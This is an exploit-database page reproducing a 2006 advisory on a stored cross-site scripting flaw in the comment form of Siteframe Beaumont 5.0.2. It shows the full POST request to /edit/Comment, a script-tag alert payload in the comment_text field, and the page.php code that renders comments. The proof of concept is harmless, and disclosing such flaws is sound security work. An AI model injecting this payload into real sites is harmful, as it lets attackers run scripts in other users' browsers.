Advertisement






Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

CVE Category Price Severity
CWE-79 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2006-02-24
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006020049

Below is a copy:

Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

####################################

Information of Software:

Software: Siteframe Beaumont 5.0.1a  
Site: http://www.siteframe.org/
Description of software: Siteframe is a lightweight content-management 
system designed for the rapid deployment of community-based websites. 
With Siteframe,a group of users can share stories and photographs, create blogs, 
send email to one another, and participate in group activities.

####################################

Bug:

Siteframe contains a flaw that allows a remote cross site scripting attack. 
The vulnerability is found in the user comment page and the user can modify 
the function GET and insert the XSS code

- http POST request

http://[target]/edit/Comment
POST /edit/Comment HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co
mment_subject=Kiki&comment_text=Hi&_submitted=1

but we can modify the request POST in this way:

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co
mment_subject=Kiki&comment_text=<script>alert("lol");</script>&_submitte
d=1

---------------------------------------------------------

Example:

you can insert in the text post an XSS code or you can modify the request in this way:

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co
mment_subject=Kiki&comment_text=[XSS]&_submitted=1

---------------------------------------------------------

The bug is in this part of page.php

[...]
    // get the comments
    if ($p->get('allow_comments'))   // are comments allowed?
    {
        // display comments
        if (config('threaded_comments'))
            $clist = $p->get_threaded_comments();
        else
            $clist = $p->get_comments();
        $PAGE->assign('comments', $clist);
        $PAGE->assign('num_comments', count($clist));

// now, create a comment form
        $c = new Comment;
        $c->set('comment_page_id', $p->id());
        $PAGE->assign('comment_form', $c->form());
    }
[...]

####################################

Credit:

Author:  Kiki
e-mail: federico.sana (at) alice (dot) it [email concealed]
web page: http://kiki91.altervista.org

####################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum